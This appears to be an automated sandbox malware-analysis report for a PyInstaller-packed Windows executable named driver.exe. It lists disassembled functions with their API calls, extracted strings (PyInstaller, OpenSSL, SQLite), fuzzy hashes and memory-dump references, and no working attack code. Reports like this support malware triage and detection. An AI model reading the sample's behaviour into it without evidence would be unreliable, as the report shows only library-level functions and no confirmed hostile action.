Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction ID: cfa19f61f0802f777e62fdf0d77e5a8d80f18a55cbfcfb7aa0afd87f2970415e
Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
Instruction Fuzzy Hash: B7D10672B19A818EE710CF66D4442AC3BB1FB44F9CB448235DE5E97B9ADE78E006D340

Function 00007FF6A29CF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6A29CFAEC
_get_daylight.LIBCMT ref: 00007FF6A29CFAFD
_get_daylight.LIBCMT ref: 00007FF6A29CFB0E
_isindst.LIBCMT ref: 00007FF6A29CFBD9

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 0ade7742cb1139ad6edad806c389d333ff31c7ee319d8aa32b82e6c29b3de311
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 7A51E672F4A2118BFB18CF65D9516BC27A1AB00F9CF50413AEE1DD2AE6DF78B4019700

Function 00007FF6A29C57EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6A29C581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF6A29C5881
GetLastError.KERNEL32 ref: 00007FF6A29C5912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6A29C5724), ref: 00007FF6A29C595E

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 34345da926f105f09844a299d8685bc2fc463766ad38cf1b0ea008df153402ce
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 9B517C22E4A6418AFB14DFB2D4503BD23B1BB48F9DF548435DE4DA768ADFB8E441A700

Function 00007FF6A29B20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6A29B20F4
SetWindowLongPtrW.USER32 ref: 00007FF6A29B2116
GetWindowLongPtrW.USER32 ref: 00007FF6A29B2140
InvalidateRect.USER32 ref: 00007FF6A29B2160

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 6ffdb0cf0d0221358e9fe882391256db85e4156b394c2f554441733715bd3c2c
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: E5110821F4D14282F654876BE5442BA5292EF98F88F888030DB4D87B8FCDBDE4C1B200

Function 00007FF6A29D5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A29D17D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D1803

_get_daylight.LIBCMT ref: 00007FF6A29D5CA4
_get_daylight.LIBCMT ref: 00007FF6A29D5CB5

Strings

?, xrefs: 00007FF6A29D5C35

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction ID: 8f0ca59b1b4c8bdb8dcc6cf619dedc6a632142d022b155d49dff1be3c8e0507e
Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
Instruction Fuzzy Hash: DD413912A4A28247FB249B27D44137A66E0EF90FACF144235EE5C86AD7DFBCD441E700

Function 00007FF6A29C9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C90B6

Part of subcall function 00007FF6A29CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6A29BCC15), ref: 00007FF6A29C90D4

Strings

C:\Users\user\Desktop\driver.exe, xrefs: 00007FF6A29C90C2

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\driver.exe
API String ID: 3580290477-2459203064
Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction ID: 9db338936b69dce85dddd4cdc65443c6794ef8bd36d3b9f2a2aabfeef0e3c6fd
Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
Instruction Fuzzy Hash: 9E41A032A4AB428AF758DF27E5811BD6794EF49FD8B454035E94E83B86CEBCF4819300

Function 00007FF6A29CCCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6A29CCDBF
GetLastError.KERNEL32 ref: 00007FF6A29CCDE1

Strings

U, xrefs: 00007FF6A29CCD6B

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 5f470999ecf937b06abc2f2cdefb3448ada16cd907757714173054491b27a582
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 4841C732B19A4185DB208F26E4443AA6BA0FB98F98F444035EE4DC7B99DF7CE401D740

Function 00007FF6A29CF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6A29CF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6A29CF6BA

Strings

:, xrefs: 00007FF6A29CF67E

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction ID: a416c895f446f28496a71d9840456b4e57741596a3721b176f5b637dddf89f80
Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
Instruction Fuzzy Hash: 3321E432A4928586FB24AB12D05426D73B1FB84F8CF954036DA8D83696DFFCE9459B40

Function 00007FF6A29BFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6A29BFE08
RaiseException.KERNEL32 ref: 00007FF6A29BFE49

Strings

csm, xrefs: 00007FF6A29BFE36

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 35c87853e0add64c2fb32127df40c301b7cb301cf980b52a70198180d7b8e47e
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 27115E32609B8182EB208F16F44026977E1FB88F88F584234EB8D87B56DF7CD5519B00

Function 00007FF6A29D07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D07DC
GetDriveTypeW.KERNEL32 ref: 00007FF6A29D081C

Strings

:, xrefs: 00007FF6A29D0805

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 8c670cf2ca3cfcf05c6d961dac0df574b98f2fd56279d5e767f6498557b10572
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 7F018422A5E20786F7209F62986627E27E0EF44F0CF801035D94DC6A97DFACE504AA14

Analysis Process: driver.exePID: 6620, Parent PID: 5708COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1%
Total number of Nodes:	1050
Total number of Limit Nodes:	91

Executed Functions

Function 00007FF6A29B1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6A29B3B32
pyi-contents-directory, xrefs: 00007FF6A29B3B8D
pyi-python-flag, xrefs: 00007FF6A29B3AD6
Failed to remove temporary directory: %s, xrefs: 00007FF6A29B3FC3
VCRUNTIME140.dll, xrefs: 00007FF6A29B3DB1
Failed to convert DLL search path!, xrefs: 00007FF6A29B3DDC
MEI, xrefs: 00007FF6A29B3933
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6A29B3971
Py_GIL_DISABLED, xrefs: 00007FF6A29B3AF4
Failed to start splash screen!, xrefs: 00007FF6A29B3ED4
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6A29B3D12
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6A29B39DE
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6A29B3A17, 00007FF6A29B3A2F, 00007FF6A29B3A9B
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6A29B3BE8
pyi-disable-windowed-traceback, xrefs: 00007FF6A29B3BB2
bye-runtime-tmpdir, xrefs: 00007FF6A29B3B68
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6A29B3A0B, 00007FF6A29B3CD4, 00007FF6A29B3F6B
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6A29B3E0A
_PYI_SPLASH_IPC, xrefs: 00007FF6A29B3A23, 00007FF6A29B3EF5
Could not create temporary directory!, xrefs: 00007FF6A29B3CBF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6A29B3EBB
Failed to load splash screen resources!, xrefs: 00007FF6A29B3E85
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6A29B3882, 00007FF6A29B38AF
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6A29B3EA6
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6A29B3C61
pkg, xrefs: 00007FF6A29B39BE
_PYI_ARCHIVE_FILE, xrefs: 00007FF6A29B38D2, 00007FF6A29B39FF
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6A29B3D35

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction ID: 1277dd79a844d1a4d0e827266c48365d8da19a83f5b3041addea4afc6c45984e
Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction Fuzzy Hash: 52328B21A8E68291FA14EB26D4543B966A5EF44F88F844036DA5DC32C7EFACF558F304

Function 00007FF8A8041A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON

Download Yara Rule

Strings

HEAD , xrefs: 00007FF8A808B929
GET , xrefs: 00007FF8A808B8E8
CONNE, xrefs: 00007FF8A808B95A
POST , xrefs: 00007FF8A808B90B
..\s\ssl\record\ssl3_record.c, xrefs: 00007FF8A808ACF8, 00007FF8A808AEA7, 00007FF8A808B01D, 00007FF8A808B06B, 00007FF8A808B09B, 00007FF8A808B0C8, 00007FF8A808B0F5, 00007FF8A808B1A2, 00007FF8A808B1EB, 00007FF8A808B330, 00007FF8A808B358, 00007FF8A808B38F, 00007FF8A808B3C4, 00007FF8A808B445, 00007FF8A808B489, 00007FF8A808B4AB, 00007FF8A808B74F, 00007FF8A808B7CE, 00007FF8A808B7FB, 00007FF8A808B828, 00007FF8A808B861, 00007FF8A808B88E, 00007FF8A808B97F, 00007FF8A808B9B9, 00007FF8A808BA27, 00007FF8A808BA5D
, xrefs: 00007FF8A808B187
ssl3_get_record, xrefs: 00007FF8A808ACF1, 00007FF8A808AEA0, 00007FF8A808B016, 00007FF8A808B064, 00007FF8A808B094, 00007FF8A808B0BC, 00007FF8A808B0E9, 00007FF8A808B196, 00007FF8A808B1DF, 00007FF8A808B324, 00007FF8A808B34C, 00007FF8A808B3B8, 00007FF8A808B439, 00007FF8A808B593, 00007FF8A808B743, 00007FF8A808B7C2, 00007FF8A808B7EF, 00007FF8A808B821, 00007FF8A808B855, 00007FF8A808B887, 00007FF8A808B973, 00007FF8A808B9AD, 00007FF8A808BA20, 00007FF8A808BA51
PUT , xrefs: 00007FF8A808B943

Memory Dump Source

Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true

Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
API String ID: 0-2781224710
Opcode ID: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction ID: 5104df559e879b727609a9d526eec8cd448b9659fdab984825b40174df789660
Opcode Fuzzy Hash: b400293baa34000780f5a339118ca863fb8810f07702305baec27cbd6e082666
Instruction Fuzzy Hash: 4B82AD22A0BA82A5FF209B11D4653B976D0EF41BC4F444036DE8D4B6D6CF3CE5A1CB29

Function 00007FF8A86B29E0 Relevance: 23.3, APIs: 2, Strings: 11, Instructions: 536COMMON

Download Yara Rule

Strings

txet, xrefs: 00007FF8A86B3056
rahc, xrefs: 00007FF8A86B3036
bolb, xrefs: 00007FF8A86B3063
generated, xrefs: 00007FF8A86B2B42
laer, xrefs: 00007FF8A86B3083
duplicate column name: %s, xrefs: 00007FF8A86B2E48
aolf, xrefs: 00007FF8A86B3096
bolc, xrefs: 00007FF8A86B3049
too many columns on %s, xrefs: 00007FF8A86B2A33
buod, xrefs: 00007FF8A86B30A9
always, xrefs: 00007FF8A86B2A95

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID:
String ID: always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$too many columns on %s$txet
API String ID: 0-2711416707
Opcode ID: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
Instruction ID: 5c1934b6a7fe14f200f408e50c4d6d77d5bcec378c2070267af5a29920df5f51
Opcode Fuzzy Hash: 05ced19ffbda2af8d84160c6d126e85ab313c37855989897a54843a788ef34fb
Instruction Fuzzy Hash: 02226722A4E6D269FB698B25905C3B97BD1EB41BCCF44A136DA9E473C1CF3CD5418328

Function 00007FF8A86692C0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A866938F
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A866946E
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8669490
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A866964E
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8669677

Strings

immutable, xrefs: 00007FF8A866980D
-journal, xrefs: 00007FF8A8669656
nolock, xrefs: 00007FF8A86697D5

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: -journal$immutable$nolock
API String ID: 22509725-4201244970
Opcode ID: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
Instruction ID: b586969076e93d94aef35278a4f74a45f0476bc678156fb714b02be4395e885b
Opcode Fuzzy Hash: d2ddce0ad0a317c0152327d0b3e11dab5987b1b9eb9b0a833ce77e87ac107de1
Instruction Fuzzy Hash: EF32AF22A0A782AAFB698F25944837937A1FF44BE4F085235CE5E47794DF3CE455C328

Function 00007FF8A86CCFB0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86CD627

Strings

invalid, xrefs: 00007FF8A86CCFF2
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FF8A86CD015
API call with %s database connection pointer, xrefs: 00007FF8A86CD004
%s at line %d of [%.10s], xrefs: 00007FF8A86CD02E
NULL, xrefs: 00007FF8A86CCFDD
unopened, xrefs: 00007FF8A86CCFFD
misuse, xrefs: 00007FF8A86CD022

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
